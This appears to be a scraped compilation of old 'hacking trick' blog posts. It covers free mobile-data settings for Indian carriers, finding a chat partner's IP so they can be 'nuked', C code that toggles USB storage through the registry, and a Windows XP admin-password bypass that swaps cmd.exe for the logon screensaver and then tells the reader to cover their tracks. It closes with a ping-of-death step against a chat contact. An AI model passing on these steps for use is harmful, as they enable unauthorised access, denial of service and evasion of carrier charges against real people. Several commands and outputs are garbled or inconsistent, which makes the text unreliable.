Free Idea GPRS (Working)

Free Gprs In Idea
IP:0.0.0.0
PORT:0000
APN:Internet
Browser:NetFront Only
Balance:<1
Activate Zero Rental & U have Done!
100% tested in Gujarat

Vodafone new gprs trick

Manual gprs settings for vodafone india is provided for you to access free gprs in this post.Many users have reported this new 2010 vodafone gprs manual gprs settings is working and you can access free gprs.

APN:vlive

IP:196.6.120.12

PORT:8080

Browser:Use UCWEB 6.3

Free ipl cricket score to mobile phone

Indian premier league season 3 cricket has started.Now mobile operators like airtel,aircel,bsnl,vodaphone,idea and all charge rs.5 per match day and so it could be expensible.If you want to receive free cricket score updates then
send CRI to 9773300000.
then send ON to 9773300000

You could also get updates by trying a search "ipl" in google via your mobile.Google has updates of ipl cricket score every hour.

HOW TO DETECT THE IP OF ANYONE CONNECTED YOU

HI FRIENDS NOW I M GOING TO TELL YOU THE TRICK OF HOW TO DETECT THE IP ADDRESS OF SOMEONE WHO IS CONNECTED TO YOU


Try doing the following to someone who is connected(online) and using ICQ98 with
their IP preference set to (N/A):


1. Send them a message, chat or check their away message.


2. Open a DOS prompt, then type "netstat -a" (without the quotes) at the prompt.

e.g. c:\windows\netstat -a
the following is an example of what you should see :

Active Connections

Proto Local Address Foreign Address State
TCP franck-a:0 0.0.0.0:0 LISTENING
TCP franck-a:1029 0.0.0.0:0 LISTENING
TCP franck-a:1030 0.0.0.0:0 LISTENING
TCP franck-a:1090 0.0.0.0:0 LISTENING
TCP franck-a:1091 0.0.0.0:0 LISTENING
TCP franck-a:1098 0.0.0.0:0 LISTENING
TCP franck-a:1099 0.0.0.0:0 LISTENING
TCP franck-a:1093 0.0.0.0:0 LISTENING
TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAIT
TCP franck-a:1091 server5.syd.www.ozemail.net:80 CLOSE_WAIT
TCP franck-a:1098 server5.syd.www.ozemail.net:80 CLOSE_WAIT
TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLISHED
TCP franck-a:137 0.0.0.0:0 LISTENING
TCP franck-a:138 0.0.0.0:0 LISTENING
TCP franck-a:nbsession 0.0.0.0:0 LISTENING
UDP franck-a:1029 *:*
UDP franck-a:1093 *:*
UDP franck-a:nbname *:*
UDP franck-a:nbdatagram *:*

so as you can see from the above information,

------> p3-max.auck.ihug.co.nz:1054 ESTABLISHED
is what we are interested in. The next thing we want to do is ping this person to
get their numeric IP.

3. So at the DOS prompt, type "ping p3-max35.auck.ihug.co" minus the quotes and the bit on
the end that say's ---> :1054 ESTABLISHED <--- We are not interested in this bit.
e.g. c:\windows\ping p3-max35.auck.ihug.co.nz


4. Well low and behold!! you should be able to see their IP address just about now :)

the following is an example of what you should see :

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.

Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trip times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms


5. So as you can see, this person's IP is ---> 209.76.151.67 and can be easily targeted
by someone wishing to nuke him.



6. If you like you can also type netstat -n which gives you the IP without pinging them as
shown above.

C:\WINDOWS\netstat -n

the following is an example of what you might see:

Active Connections

Proto Local Address Foreign Address State
TCP 203.21.7.181:1067 209.108.151.76:80 CLOSE_WAIT
TCP 203.21.7.181:1069 209.108.151.76:80 CLOSE_WAIT
TCP 203.21.7.181:1070 209.108.151.76:80 CLOSE_WAIT
TCP 203.21.7.181:1072 209.108.151.77:80 CLOSE_WAIT
TCP 203.21.7.181:1074 209.108.151.76:80 CLOSE_WAIT
TCP 203.21.7.181:1084 209.76.151.67:1054 ESTABLISHED

As you can see, the numeric IP---> 203.76.151.67 <--- (Foreign Address) is the IP we want.

Code for block unblock USB

HERE IS TRICK FOR UNBLOCK YOUR USB WHEN IT IS BLOK
JUST WRITE BELOW PROGRAM IN C AND YOU CAN UNBLOCK YOUR USB

#include

void main()
{
system(reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR v Start t REG_DWORD d 3 f);
}

Code for block USB

CODE FOR BLOCK USB

WRITE BELOW PROGRAM IN C AND MAKE YOUR USB BLOCK

#include

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

How to hack Window XP admin password

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either

Hack any PC by chatting

connect to the internet,

To findout the IP address of any particular person chatting with you
using MSN / Yahoo Messenger.

(1) c:\>windows>netstat -n >> other

This will save the o/p of the command netstat -n into
the other.txt file in the windows directory.This file contains the
address of the person you are chatting with.

suppose, you want to connect to a system's whose
IP address is 203.190.23.24,

-> c:\>windows>telnet 203.190.23.24

-> then type this command,
ping -l 65510 (hang system , you are connected to)